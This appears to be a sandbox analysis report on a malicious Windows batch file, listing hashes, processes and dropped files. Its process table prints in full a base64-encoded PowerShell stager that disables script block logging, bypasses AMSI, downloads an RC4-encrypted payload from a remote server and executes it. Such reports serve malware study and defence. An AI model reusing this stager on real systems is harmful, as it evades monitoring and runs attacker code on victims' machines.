File name: | dc0_launcher1.bat |
Full analysis: | https://app.any.run/tasks/ff8a0318-fd00-453a-81a4-86ce5a68ca63 |
Verdict: | Malicious activity |
Analysis date: | May 14, 2019, 21:34:17 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/x-msdos-batch |
File info: | DOS batch file, ASCII text, with very long lines |
MD5: | 0DD1E509AA81E4FE0192A6F9EFCB85C6 |
SHA1: | 04EDE6B60BC48B6F739E616C9BF3123730E865BC |
SHA256: | 82F5C617D93A7FAA6C0CED303E818A150717FB91EC011445A303259ED15FD6B7 |
SSDEEP: | 48:xMOk4etDY107jD4pyJ+keZ72zcXuCW1MK317yzzNfAdmSzOlZY0k5RqLw3Hdd:BJey103Doy1GSwXuz1r3c/NOOI0cRqL4 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3128 | cmd /c ""C:\Users\admin\AppData\Local\Temp\dc0_launcher1.bat" " | C:\Windows\system32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2880 | powershell -noP -sta -w 1 -enc SUYoJFBTVkVSc2lvTlRhQmxlLlBTVmVyc0lvTi5NQWpvUiAtZ2UgMyl7JEdQRj1bckVGXS5BU3NFbWJseS5HRXRUeVBFKCdTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlV0aWxzJykuIkdlVEZJZWBMRCIoJ2NhY2hlZEdyb3VwUG9saWN5U2V0dGluZ3MnLCdOJysnb25QdWJsaWMsU3RhdGljJyk7SWYoJEdQRil7JEdQQz0kR1BGLkdFVFZBTHVlKCROVUxsKTtJRigkR1BDWydTY3JpcHRCJysnbG9ja0xvZ2dpbmcnXSl7JEdQQ1snU2NyaXB0QicrJ2xvY2tMb2dnaW5nJ11bJ0VuYWJsZVNjcmlwdEInKydsb2NrTG9nZ2luZyddPTA7JEdQQ1snU2NyaXB0QicrJ2xvY2tMb2dnaW5nJ11bJ0VuYWJsZVNjcmlwdEJsb2NrSW52b2NhdGlvbkxvZ2dpbmcnXT0wfSRWYUw9W0NPTExFY1RJb25TLkdFTmVSSWMuRGlDdGlPbmFyWVtTVHJpTmcsU3lTVGVtLk9iSmVDVF1dOjpuRVcoKTskdmFsLkFERCgnRW5hYmxlU2NyaXB0QicrJ2xvY2tMb2dnaW5nJywwKTskVmFsLkFkRCgnRW5hYmxlU2NyaXB0QmxvY2tJbnZvY2F0aW9uTG9nZ2luZycsMCk7JEdQQ1snSEtFWV9MT0NBTF9NQUNISU5FXFNvZnR3YXJlXFBvbGljaWVzXE1pY3Jvc29mdFxXaW5kb3dzXFBvd2VyU2hlbGxcU2NyaXB0QicrJ2xvY2tMb2dnaW5nJ109JHZhbH1FbFNle1tTY1JpUHRCbE9jS10uIkdFVEZJZWBMZCIoJ3NpZ25hdHVyZXMnLCdOJysnb25QdWJsaWMsU3RhdGljJykuU2VUVmFMVWUoJE5VTEwsKE5ldy1PQmpFY1QgQ09sbGVjVElvblMuR2VuRXJpQy5IQVNoU0V0W3NUUmlOR10pKX1bUmVGXS5Bc1NlbWJseS5HRVRUWXBlKCdTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLkFtc2lVdGlscycpfD97JF99fCV7JF8uR2V0RmlFTEQoJ2Ftc2lJbml0RmFpbGVkJywnTm9uUHVibGljLFN0YXRpYycpLlNlVFZhTFVFKCROdUxsLCRUUlVFKX07fTtbU1lTdGVtLk5FdC5TZXJ2SWNlUG9pTnRNYW5hR2VyXTo6RXhwZWNUMTAwQ09udGludUU9MDskV2M9TkV3LU9CamVDdCBTWVNURW0uTkV0LldlYkNMaWVuVDskdT0nTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBXT1c2NDsgVHJpZGVudC83LjA7IHJ2OjExLjApIGxpa2UgR2Vja28nOyRXYy5IZUFkZXJzLkFERCgnVXNlci1BZ2VudCcsJHUpOyR3Qy5QUm9YWT1bU1lzVGVNLk5FdC5XRUJSZVFVRXN0XTo6REVmQVVsdFdlYlBST3hZOyR3Qy5QUk9YWS5DUmVkZU50SUFMUyA9IFtTeXNUZU0uTmV0LkNSRURFblRJYUxDYUNIRV06OkRFZmF1bFRORXR3T1JrQ1JFZEVuVGlBbHM7JFNjcmlwdDpQcm94eSA9ICR3Yy5Qcm94eTskSz1bU3lTVGVNLlRFWHQuRW5DT0RpbkddOjpBU0NJSS5HZXRCWVRlUygnRks8aXQoe0R+cHJxZUIpdUVPU3NSOWg4bG13NiwmQDQnKTskUj17JEQsJEs9JEFSR3M7JFM9MC4uMjU1OzAuLjI1NXwleyRKPSgkSiskU1skX10rJEtbJF8lJEsuQ09VblRdKSUyNTY7JFNbJF9dLCRTWyRKXT0kU1skSl0sJFNbJF9dfTskRHwleyRJPSgkSSsxKSUyNTY7JEg9KCRIKyRTWyRJXSklMjU2OyRTWyRJXSwkU1skSF09JFNbJEhdLCRTWyRJXTskXy1CeE9SJFNbKCRTWyRJXSskU1skSF0pJTI1Nl19fTskc2VyPSdodHRwOi8vMTAuMC4xODUuMTAxOjgwJzskdD0nL2FkbWluL2dldC5waHAnOyRXYy5IZUFkZXJTLkFEZCgiQ29va2llIiwic2Vzc2lvbj1aWDRDL0RrY3JMR0NzOWhhUzllUGtab0xOR0U9Iik7JERhdEE9JFdDLkRvV05sT2FkRGFUYSgkU0VSKyR0KTskaVY9JERhVGFbMC4uM107JERhdGE9JERBdEFbNC4uJERhdGEubEVOZ3RoXTstak9pTltDSEFyW11dKCYgJFIgJERBdGEgKCRJViskSykpfElFWA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2880 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GCSS8JECNY15ARB7Z1GV.temp | — | |
MD5:— | SHA256:— | |||
2880 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:131DC75F6D4142CA9244945A91A71E8D | SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 | |||
2880 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF11ebc4.TMP | binary | |
MD5:131DC75F6D4142CA9244945A91A71E8D | SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 |